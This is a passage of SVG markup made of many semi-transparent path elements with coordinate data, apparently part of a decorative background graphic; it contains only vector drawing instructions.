3.8-5.21,12.22-.4l5.06-7.23c.48,2.19.72,3.3,1,4.78,2.1-4.3,2.88-4.3,5.73-1.12a7.44,7.44,0,0,0,4.27,2.35,45.42,45.42,0,0,0,10.16,0,5.08,5.08,0,0,0,3.59-2.81A5.3,5.3,0,0,0,688,40.43c-1.13-1.14-3.13-1.42-5-2.18-.5-2.48-1.7-4.39-5-2.79,3.6,2.83-1.11,4.59-.89,7-1.57,0-3.41.6-4.67,0-2.41-1.19-2.5-3.75-1.62-5.94,1.28-3.16,3.88-.91,5.91-1.06-.44-.78-.83-1.59-1.33-2.33-2.26-3.31-3.87-3.48-6.69-.82a6.4,6.4,0,0,1-2.42,1.67,62.13,62.13,0,0,1-6.15,1l-1.88-1.38-1.52,2h-8.27c1.33-5.28,2.68-10.65,4.11-16.31-4.69,1.4-3.38,6.54-6.6,9-.92-2.35-2.33-4.53-2.5-6.81-.14-2-.06-4.69,2.8-5.56,1.48-.45,3-.92,4.43-1.4s2.73-1,4.14-1.36c2.09-.51,4.21-.88,6.55-1.35l.93,2.22c4.46-4.06,8.06-7.14,15.18-6.16C686,9,694,12.55,702.68,11.92a1.92,1.92,0,0,1,1.27.45c3,2.56,4,.72,4.66-2,.21-.87.53-1.72.79-2.59-5.35,0-10.71,0-16.06-.09A20,20,0,0,1,689.59,6.87ZM654.52,37.15c2.27.73,3.48,4,2.18,6.56a2.69,2.69,0,0,1-2.54.71,46,46,0,0,1-5.11-3.74C649.79,37.38,651.49,36.18,654.52,37.15Zm-13.87,6.29c-2.69-.9-5.43-1.65-8.51-2.58,1.6-5.08.08-11.16,5.71-14.76a42.76,42.76,0,0,1,3.9,4.46c.48.72.17,2,.21,3,0,.45,0,.9,0,1.35a63.89,63.89,0,0,1,1.36,6.91C643.53,43.65,642.33,44,640.65,43.44Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M704.78,41.63c-.52,3.77-1.6,4.69-5.5,4.49,0-3.14,2.62-3.69,4.68-4.74a1,1,0,0,0,0-.49,30,30,0,0,0-4.4-3.71c-.91-.53-2.35-.11-3.55-.12,0,1.14,0,2.28,0,3.41s.79,2.16.45,2.9c-1.18,2.64-1.06,4.29,2.27,4.71a13.59,13.59,0,0,1,3.13,1.19L706,44.44c-.25-1-.5-2-.74-3A.67.67,0,0,0,704.78,41.63Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M394.46,63.7c-2.38-.94-4.73-2.35-7.16-2.52-2.15-.15-4.3-.15-6.46-.1l3.56,3.78c2,0,4.05,0,6.07,0l1.07-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M372.31,61.37c1,.48,2,.93,3,1.44,1.29.66,2.55,1.36,3.83,2h5.28l-3.56-3.78C378,61.15,375.15,61.31,372.31,61.37Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M800.56,9.76v4.17c1.09-.25,2.2-.45,3.28-.74,4.21-1.14,8.37-1.59,12.42.6l1.36,0L819,12.51a5.11,5.11,0,0,0-1.43-.7C811.89,11.1,806.22,10.44,800.56,9.76Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M790.24,10.21l4.23.85h2v-.69C794.45,9.12,792.39,7.81,790.24,10.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M560.88,52.66l.74,1.36,2,0,.81-1.24-.86-.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M535.05,70.31l1.39.76.68-.07c0-.71,0-1.42-.08-2.13Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M907.69,33.92a2.27,2.27,0,0,0-.64,1.7c.11.45,1.06,1.14,1.38,1,2-.74,3.93-1.67,5.89-2.54l-4.5-2.05A19.13,19.13,0,0,0,907.69,33.92Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M774.14,6.48c-7,.2-14.12-2-21.12.67-1.25.47-3-.51-4.53-.66-1.69-.16-3.39-.12-5.09-.17.06.21.12.62.18.62,3-.07,4.66,5.33,8.51,2.15.26-.22,1.08.12,1.59.33A12.36,12.36,0,0,0,764.73,9a7.7,7.7,0,0,1,4.15-1.16c4.94.7,9.81,1.86,14.74,2.64a23.59,23.59,0,0,0,4.87-.23c-.69-.5-1.32-1.28-2.08-1.44C782.34,7.86,778.21,6.36,774.14,6.48Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M718.37,6.05c-1.07,2.1-2.62,1.68-4.27,1a31.91,31.91,0,0,0,1.15,4.13c.67,1.61,2,1.72,2.69.2,1.27-3,3.11-2.54,4.43-1.62l8.09-4c-3.61-.22-7.22-.47-10.83-.6A1.85,1.85,0,0,0,718.37,6.05Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M742.11,6.43l-7.61-.72C737.53,9.47,740,9.71,742.11,6.43Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M856.46,18.52c-.18,1.2-.37,2.39-.62,4,2.64-.18,5.09-.75,7.41-.4,2.49.37,4.86,1.61,7.29,2.46a1.37,1.37,0,0,0,.67,0c3.34-.5,6,.93,8.83,2.53,1.63.95,3.74,1.06,5.64,1.55l3.41-3.4a22,22,0,0,0-2.23-.68Q871.67,21.57,856.46,18.52Z\" transform=\"translate(0 0)\"\n opacity=\"0.2\"></path>\n <path d=\"M488.92,74.79c.16.06.78-1.15,1.18-1.77l-11-1.2C481.74,74.91,485.7,73.64,488.92,74.79Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M659.68,17.31c-.72.08-1.33,1.08-2,1.67.74.74,1.37,1.88,2.23,2.1s1.69-.75,2.55-1.19c-.19-.44-.39-.87-.59-1.31C661.14,18.12,660.36,17.24,659.68,17.31Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M535.75,59.42,533,62.18l4.71-.66Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M537.23,68.3c2.46-2.09,2.67-4,.66-6.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M530.08,65.21l1.9-2.76L528.33,60C528.79,61.41,529.26,62.79,530.08,65.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M374.52,67.73a19.45,19.45,0,0,1-14.27,2,18.31,18.31,0,0,0-4.75-.24c.4,1.07.81,2.13,1.21,3.19a6.66,6.66,0,0,0,1,.11c7.47.14,14.95.07,22.42.08q-1.46-2.59-2.92-5.19C376.3,67.69,375.23,67.36,374.52,67.73Z\" transform=\"translate(0 0)\"\n opacity=\"0.2\"></path>\n <path d=\"M348.81,67.74c-.49-.42-1.52-.22-2.31-.31l-2.6,1.71-2.1-1.4-1.34-.53c-3.08.27-6.49,1.53-9.15.61a78,78,0,0,0-15.47-4.16c-6.31-.83-12.44-2-18.3,1.54a49,49,0,0,0,5.8.14c1.6-.15,3.4-1.48,4.71-1.06,6.18,2,13.42-.24,18.89,4.64a3.66,3.66,0,0,0,2.22.68c3.34.07,6.68-.09,10,.06,1.84.09,3.65.69,5.48,1,2.62.37,5.27.56,7.87,1,1.42.23,2.8.84,4.19,1.09-.4-1.06-.81-2.12-1.21-3.19C353.18,69.56,350.86,69.5,348.81,67.74Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M405.76,61.52c.28-2,0-3.65-1.7-3.6L400.4,60l-1.3.76a4.77,4.77,0,0,1-1.22,3.11l4.5-1C402.86,62,403.82,61.39,405.76,61.52Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M398.15,64.26l-.54-.19a3.19,3.19,0,0,1-2.69-.09l-.13-.24.21-.18-.54.14.38.15a11.37,11.37,0,0,1-3,.94l-1.38,0-3.73,1.32,1.42.15a22.56,22.56,0,0,1,4.12,2.4c3.56,3.25,5.89,3.22,8.89-.42l.65-1.35c0-.85,0-1.73.13-2.53A12,12,0,0,0,398.15,64.26Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M293.23,62.28c-3.39.51-6.81.82-10.2,1.29a25.57,25.57,0,0,0-3.07.78c3.6.21,7.19.47,10.79.62,1.82.07,3.65-.06,5.48-.09C296.06,63.05,295.38,62,293.23,62.28Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M381.28,72.89c2,.52,3.14-.28,3.48-2.33.19-1.18.52-2.34.79-3.51l-2.08.58Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M419.42,60.3c-.14-.62-2.26-1.23-3.36-1.08-.95.13-2.57,1.52-2.45,2a3.58,3.58,0,0,0,.91,1.54l6.14.81A12.24,12.24,0,0,1,419.42,60.3Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M416.07,66a3.28,3.28,0,0,1-3.5.35,25.63,25.63,0,0,1-4.73.71,2.23,2.23,0,0,0,1.79.7c2.87.1,5.75-.14,8.63-.16,1.26,0,2.79-.18,3.68.45.62.43.79,2.32.39,3.2-1.43,3.17.41,3.24,2.63,3.16.88-3.25,3.72-2.82,6.1-3.27-.16-.29-.25-.78-.48-.85-3.11-1-6-2.18-8.09-4.26C420.35,66,418.21,66,416.07,66Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1895.24,114.11a8,8,0,0,1,1.56-2.31,11.38,11.38,0,0,1-1.64.24C1895.17,112.73,1895.19,113.42,1895.24,114.11Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1905.75,106c0-.09.08-.18.11-.27l-1.19-.76c-5.26.56-7.07-.66-9.71-4.92-.77-1.25-3.3-1.84-5.07-1.94-2.62-.15-5,.42-7.87-.48-2.42-.78-5.66,1-9.08,1.79a7.37,7.37,0,0,1-.4-1.8c-.18-3-2.6-4.3-5.11-2.8a6.53,6.53,0,0,1-2.39,1.06c-3.41.41-6.84.81-10.26.92a27.36,27.36,0,0,1-5.26-.81l-3.89-.68a11.48,11.48,0,0,0,2.06,2.26c2.17,1.39,4.47,2.57,6.7,3.87.85.5,1.65,1.58,2.45,1.55,3.57-.12,7.14-.54,11.48-.92a8.36,8.36,0,0,1,1.19,1.93,8.2,8.2,0,0,0,7.45,5c.56,0,1.08.73,1.68.85,2,.4,4,.68,6,1-.24-1.53-.5-3.06-.72-4.6-.12-.86-.48-1.9-.15-2.56a2.76,2.76,0,0,1,2.16-1.12,51.21,51.21,0,0,1,5.5.55l.92-1.3a38.5,38.5,0,0,1,2.41,5.92,21,21,0,0,1,.41,4.29,11.38,11.38,0,0,0,1.64-.24,4.84,4.84,0,0,1,2.63-1.43v-5.44A6.52,6.52,0,0,0,1905.75,106Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1906.11,105.9l-.25-.16c0,.09-.07.18-.11.27Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1906.31,106l-.2-.13-.36.11c-.87,2.2-1.66,4.4-.56,6.6,0-3.84,1.92,0,3.84-1.92a6.49,6.49,0,0,0-1.87,4.88c.08,0,.16,0,.25.06,1.19.38,2.88-.85,4.34-1.34-.64-1.15-1.21-2.34-1.94-3.42C1908.7,109.22,1907.48,107.64,1906.31,106Z\" transform=\"translate(0 0)\"\n opacity=\"0.2\"></path>\n <path d=\"M1905.19,112.61c-1.1-2.2-.31-4.4.56-6.6a6.52,6.52,0,0,1-6.32-1.08v5.44a7.28,7.28,0,0,1,3.42.33c.57.17.94,1,1.41,1.51-.47.39-.92.82-1.41,1.18-1.16.85-2.33,1.68-3.5,2.51a10.94,10.94,0,0,1,7.81-.33,6.49,6.49,0,0,1,1.87-4.88C1907.11,112.61,1905.19,108.77,1905.19,112.61Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1841.25,93.09l-2.65,1.15c-.44,1.45-.88,2.9-1.39,4.61l7.11-3.44-1.62-1.88Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1805.12,94.7l.12,1.32c1.9.79,3.55.73,4.61-1.34l-2.87-1Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1610.26,74.9c-3-2.13-6.32-3.74-9.72-5.7-1.09,2.47-1.5,4.62-4.13,3-.25-.15-1.88,1.28-2.25,2.23-.27.7.45,1.8.76,2.82l-3.83.53a15.57,15.57,0,0,1-.45-3.63c.42-3.24-2.32-3.61-4.14-4.18-2.08-.66-4.46-.36-6.71-.47-4.33.72-1.18,5.15-3.41,8.37l-3-5.61c-5.69-1.77-11.75,2.1-17-2a.46.46,0,0,0-.33-.07c-3.42.13-6.84.22-10.25.46a7.76,7.76,0,0,0-2.34,1,76.7,76.7,0,0,0,11,.88c3.11,0,6.07,3.85,9.82,1.13,4.48,2.21,9.91,2.83,12.88,7.72,2.49-.31,4.22-1.21,4.2-4.18,0-.68,1.05-2,1.44-1.94a3.9,3.9,0,0,1,2.48,1.54c.49.79,0,2.29.57,2.91a21.57,21.57,0,0,0,3.84,2.76c.55-2,1.63-2.65,3.75-2,1,.3,2.26-.22,3.4-.36l.61-.79c.34-1,.42-2.56,1.06-2.83,2.55-1.06,5.31-2.4,7.91-2.24,1.38.09,2.58,3,3.87,4.69l.85.6,4.24-4.74-.08,0-.07-.06C1613.61,75.42,1612.25,76.32,1610.26,74.9Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1672.05,77.23c-7.14,2.24-12.93-.67-18.27-5.13-2,1.79-4.39,3.18-5.58.06s-3.12-3.37-5.78-3.25a10.49,10.49,0,0,1-3.93-.59c-4.74-1.76-11.18.87-13.09,5.71a36,36,0,0,1-3.67-1.4c-3.2-1.64-4.49-1.26-6.49,2.07l.07.06.08,0c3.23.21,6.47.29,9.67.68,1,.13,2,1.08,3,1.65,2.17-.16,4-.47,3.94-3.46,0-1,1.46-2.37,2.55-2.75.7-.25,2,.95,2.9,1.6.54.37.87,1.24,1.42,1.38,5,1.3,10.1,2.46,15.14,3.74,2.52.64,5,1.52,7.51,2.18,1.6.42,3.25.65,4.88,1l1.9-1,4-1.18,1.11-.79a2.61,2.61,0,0,0-.08-.55Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1418.08,75.15l-2,1.17A2.8,2.8,0,0,1,1411.7,74c-.08-2.55-1.19-2.8-3.27-2-1.73.62-3.53,1-5.69,1.6-.74,2-1.7,4.51-2.34,6.2-2.42,0-5.09-.22-5.19.16a12.83,12.83,0,0,1-1.06,3c2.55.09,4.55-2.42,7.06-1.16.26-.38.5-.77.75-1.18.9-1.51,2.64-3.34,4.15-3.49a16.85,16.85,0,0,1,7.51,1.39c.92.37,1.21,2.37,2.16,4.46,1-3.19.65-6.75,4.61-6.79-.18-.64-.36-1.28-.59-2.08Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1521.68,67.32a3.24,3.24,0,0,0-2.29.3c-3.15,2.53-6.32,1.19-9.62.47-1.15-.26-2.56.65-3.85,1,3.86.44,7.7,1.08,11.57,1.25,4.37.19,8.78-.25,13.15,0,3.83.2,7.63.94,11.44,1.44a11.89,11.89,0,0,0-2.91-1.47C1533.35,69.22,1527.52,68.26,1521.68,67.32Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1432.47,69.35c-2.84-.79-6.83,2.34-7.59,5.52l9.91-2.57C1434,71.27,1433.44,69.62,1432.47,69.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1494.72,69.78c1.49-.63,3.52.08,5.31.07a7.58,7.58,0,0,0,1.93-.52L1491.9,68C1492.27,69.4,1492.31,70.81,1494.72,69.78Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1823.13,91.5c2.2,1.79,4.19,4,6.66,5.22,1.69.84,4.32,1.3,5.58-1.44-3-1.35-5.89-2.82-8.94-4C1825.5,90.94,1824.24,91.41,1823.13,91.5Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1803.27,96.36l-3.54-.31C1800.73,98.26,1801.87,98.73,1803.27,96.36Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1899.21,117.79l.45.23-.06-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1899.32,115.94l-1,1.4.9.45.39-.15C1899.5,117.07,1899.41,116.5,1899.32,115.94Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M829.91,17.17c3.32,1.48,6.16,4,8.5,5.66.69,2.1.83,4,1.82,5,.54.56,2.52-.25,3.85-.44L844,26.26l-3.13-1.57,1.68-4.79.52.89,5.46-.74c2.14,1.1,3.93,2,5.74,2.95,1.08.55,2.9.83,3.16,1.63,1.61,4.89,4.53,2.43,7.35,1.72a17.15,17.15,0,0,1,4.64,0c.77,0,1.59.45,2.3.29,3.48-.78,6.07.56,8.42,3s3.3,2.39,5.56-.86h0l0,0h0c-1.9-.49-4-.6-5.64-1.55-2.79-1.6-5.49-3-8.83-2.53a1.37,1.37,0,0,1-.67,0c-2.43-.85-4.8-2.09-7.29-2.46-2.32-.35-4.77.22-7.41.4.25-1.64.44-2.83.62-4l-5.58-2.33-1.28-.27c-1.13.42-2.29,1.24-3.4,1.17-2.26-.13-4.56-1.22-6.33,1.25a3.36,3.36,0,0,1-2-1,4.6,4.6,0,0,0-4.76-2.91c-2.65,0-5.3-.43-8-.67L823,12.54l-4,0-1.36,1.23a11.41,11.41,0,0,0,2.6,1.37C823.45,15.84,827,15.86,829.91,17.17Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M628.92,64.11a4,4,0,0,0,2.57-1.64c1.61-3.27,4-2.52,6.27-1.29,3.89,2.08,8,1.82,10.88-.64l6.54.81c.05.43.13,1.18.18,1.61,6.45-2.75,14.07-1.15,19.28-6.26,4,3.24,3.87,3.16,7.22-.54a4.35,4.35,0,0,1,3.43-.95c3.6.59,6.43-.35,8.67-3.28s3-2.8,5.56,0l2.38-2.67a13.59,13.59,0,0,0-3.13-1.19c-3.33-.42-3.45-2.07-2.27-4.71.34-.74-.37-1.91-.45-2.9s0-2.27,0-3.41c1.2,0,2.64-.41,3.55.12a30,30,0,0,1,4.4,3.71c-.4-.91-1.31-2-1.11-2.71.86-3.1-.42-3.09-2.93-2.79-1,.12-2.25-1.43-3.39-2.22a14.65,14.65,0,0,1,2.5-1.72c1.06-.45,2.31-.45,3.37-.89.76-.32,2-1.2,1.91-1.55a22.79,22.79,0,0,0-1.6-3.82L699,26c.5-1,.78-2.26,1.56-2.94a29.86,29.86,0,0,1,4.4-2.71c.47,1,1,1.58,1,2.15-.08,2.06.56,4.18,2.67,3.75,1.19-.24,2-2.77,2.79-4.36.27-.53-.11-1.35,0-2,.18-1.56.46-3.11.7-4.66l.94-.57c2.37,4.62,5.35,3.84,8.33,1.56,1.77-1.36,3.91-2.68,4.86-4.55,1.87-3.63,2.13-4,6.66-2.81l-1.71,4.17c2.19,0,3.65.07,5.11,0,2-.12,4.31,1,5.73-1.59.21-.39,2-.5,2.47-.08,2.2,1.88,4.7.78,7,1.14a74.34,74.34,0,0,1,7.66,2,7.56,7.56,0,0,0,1.82.32c1.35,0,2.9-.49,4,0,2.42,1,4.58,2.68,6.93,3.9a14.93,14.93,0,0,0,3.31.88c0-1.07-.14-2.14-.07-3.19s.2-3.15.54-3.2a34.09,34.09,0,0,1,7.62-.28c.21,0,.26,2.7.33,4.15a13.6,13.6,0,0,0,0,2.71c.31,1.18.71,3,1.46,3.27,1.8.53,4,2.17,6-.42-.76-.89-1.8-1.63-2.08-2.59a4.11,4.11,0,0,1,.35-3.22,75.25,75.25,0,0,1,5.12-5.76l-4.23-.85h-1.75a23.59,23.59,0,0,1-4.87.23c-4.93-.78-9.8-1.94-14.74-2.64A7.7,7.7,0,0,0,764.73,9a12.36,12.36,0,0,1-11.05.46c-.51-.21-1.33-.55-1.59-.33-3.85,3.18-5.5-2.22-8.51-2.15-.06,0-.12-.41-.18-.62l-1.29.11c-2.07,3.28-4.58,3-7.61-.72l-4,0-8.09,4c-1.32-.92-3.16-1.42-4.43,1.62-.64,1.52-2,1.41-2.69-.2A31.91,31.91,0,0,1,714.1,7l-4.7.72c-.26.87-.58,1.72-.79,2.59-.65,2.77-1.66,4.61-4.66,2a1.92,1.92,0,0,0-1.27-.45C694,12.55,686,9,677.53,7.84c-7.12-1-10.72,2.1-15.18,6.16l-.93-2.22c-2.34.47-4.46.84-6.55,1.35-1.41.35-2.76.91-4.14,1.36s-3,.95-4.43,1.4c-2.86.87-2.94,3.58-2.8,5.56.17,2.28,1.58,4.46,2.5,6.81,3.22-2.47,1.91-7.61,6.6-9-1.43,5.66-2.78,11-4.11,16.31h8.27l1.52-2L660.16,35a62.13,62.13,0,0,0,6.15-1,6.4,6.4,0,0,0,2.42-1.67c2.82-2.66,4.43-2.49,6.69.82.5.74.89,1.55,1.33,2.33l1.27,0c3.29-1.6,4.49.31,5,2.79,1.88.76,3.88,1,5,2.18a5.3,5.3,0,0,1,1.31,4.43,5.08,5.08,0,0,1-3.59,2.81,45.42,45.42,0,0,1-10.16,0,7.44,7.44,0,0,1-4.27-2.35c-2.85-3.18-3.63-3.18-5.73,1.12-.32-1.48-.56-2.59-1-4.78l-5.06,7.23c-8.42-4.81-7.21-4.6-12.22.4-1.86-2.11-4.43-4.06-6.74-2-1.57,1.36-6.06.63-5.15,4.57h7a17.25,17.25,0,0,1,.21,3.11,29.4,29.4,0,0,1-.88,3.44,13.22,13.22,0,0,1-3.1-1.4c-1.86-1.49-3.39-1.28-5.13.2a2.66,2.66,0,0,1-2.33.28c-.43-.18-.58-1.34-.58-2.07,0-2,.15-3.93.24-5.9l-1.5-.44-4.38,5.54c.44,2.07.87,4.15,1.3,6.21-5.57,1.5-5.57,1.5-5.65,3.89,1.33-.18,2.63-.43,3.94-.51A35.87,35.87,0,0,0,628.92,64.11Zm31-43c-.86-.22-1.49-1.36-2.23-2.1.66-.59,1.27-1.59,2-1.67s1.46.81,2.2,1.27c.2.44.4.87.59,1.31C661.61,20.33,660.63,21.25,659.92,21.08Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M985,55.33c1.46-2.15,3-1.15,4.76-.44,5.9,2.42,12,3.57,18.34,2.29.65-.12,2,.4,2.1.83.72,3.42,3.4,3.9,6.1,4.17,6.63.67,13.45,2.49,19-3.39.76-.81,2.85-.92,4.13-.58,4.64,1.21,9.25,2.57,13.75,4.2s7.75.24,9.1-4.07a10.62,10.62,0,0,1,.93-1.83c1.5,2.4,2.88,4.59,4.67,7.46,2-2.3,3.74-4.51,5.69-6.53.87-.9,2.23-2,3.22-1.92s2.08,1.55,2.91,2.57,1,2.73,1.83,3c3.21,1,6.57,1.61,9.87,2.35.5-1.36,1-2.72,1.44-3.87l-9.51-3.68c.26-2.06,1.18-4.23.5-5-1.34-1.55-3.45-2.5-5.7-.66-.7.57-2.06.26-3.1.48-1.46.31-3.25.32-4.28,1.19-2.55,2.15-5.08,1.41-8.44.93l6-4.6-.54-1c-2.62.6-5.77-1.68-7.81,2.27a75.78,75.78,0,0,1-4.52,7l-5-4.48c-3.75.55-7.67.15-11.14,2.29-.61.38-1.7,0-2.58,0-2.43-.07-5.53-1.09-7.16,0-2.81,1.92-5,3.09-8.39,1.6-1.68-.74-3.94-.25-5.58-1-5.87-2.85-11.71-3.89-17.88-1.09-.41.18-1.15-.31-1.71-.55s-1.53-1.05-1.94-.85c-4.21,2.08-8.5-2.77-12.67.18-.17.13-.9-.23-1.14-.54-1.95-2.59-3.37-1.33-4.72.6,2.66,1.1,5.3,2.25,8,3.27A1.59,1.59,0,0,0,985,55.33Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M409.63,67.73c2.4.08,4.82-.07,7.23-.13a2.58,2.58,0,0,1,1.94-.47,8.4,8.4,0,0,0,1.4.43,4.27,4.27,0,0,1,1.22.21c3.68.44,7.7-.46,10.67,2.75.18.2.62.21,1,.25l17.24,2.13v3.48l11.92-2c5.85-1,10,3.53,15.15,4.94,3.69,1,6.73,1.89,10-.58,1.47-1.11,2.59-3.55,5-1.2.17.17,1.73-.58,2.1-1.21a40.76,40.76,0,0,0,2.08-4.91l-3.05-1.14-2,1.35-.95.4-.4,1c-.4.62-1,1.83-1.18,1.77-3.22-1.15-7.18.12-9.79-3l-3.3-.12c-.48,2.5-2.2,2.1-3.94,1.71A45.91,45.91,0,0,0,467,72.33c-2.9-.35-6.4.42-8.61-1-4.34-2.7-8.77-1.22-13.12-1.78-3.89-.5-8-.54-11.59-1.87-5.92-2.19-11.91-1.64-17.91-1.77-2.64,0-5.27,1.05-7.93,1.07A2.23,2.23,0,0,0,409.63,67.73Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M528.33,60,532,62.45l1-.27,2.73-2.76,2,2.1a1.43,1.43,0,0,0,.16.57c2,2.19,1.8,4.12-.66,6.21a1.48,1.48,0,0,0-.19.57c0,.71.06,1.42.08,2.13.91,0,2.15.29,2.65-.18,2.74-2.53,4.64-1.92,6.27,1.18a2,2,0,0,0,1.64.63c.48-.5,1.07-1.51.86-2-1-2.06.52-5.25-2.83-6.36-.17,0,.1-3.21.62-3.36,5.07-1.48,8.48-7.13,14.61-5.91.16,0,.45-.66.68-1l-.74-1.36.07-.12-3.44-.5-8.15,0-4.79.53c-.91,2.39-1.8,4.34-5.06,2.42A10.91,10.91,0,0,0,534,54c-3.57.08-6.12,2.92-5.72,6Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M797.9,16.16c4.54,1.39,4.73,1.71,3.73,5.93,5.87,2.82,12.19.84,19.09,1.15L818.5,19c-2,1.22-3.54,2.9-4.49,2.61-2-.6-3.28-2.38-2.1-4.74l.71.53,3.64-3.57c-4-2.19-8.21-1.74-12.42-.6-1.08.29-2.19.49-3.28.74V9.76l-4,.62v.69C797,12.75,794.67,15.18,797.9,16.16Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M898.68,32.93A23.5,23.5,0,0,1,905,36.22c2.23,1.52,4.15,3.79,7.08,1.3a1.55,1.55,0,0,1,1.24-.28c3.11,1,6.21,2.07,9.67,3.24a6.75,6.75,0,0,1,8.71,1.39c1.94,2.4,6.73,2.33,9.15-.14a9.88,9.88,0,0,0-2.6-1.37c-8.16-1.43-15.42-6.32-23.95-6.26-2,.87-3.89,1.8-5.89,2.54-.32.12-1.27-.57-1.38-1a2.27,2.27,0,0,1,.64-1.7,19.13,19.13,0,0,1,2.13-1.87l-.15-.16-2.89-.56a48.5,48.5,0,0,0-5.84-2.1,17.66,17.66,0,0,0-4.35.07C896.65,30.87,896.43,32.29,898.68,32.93Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path 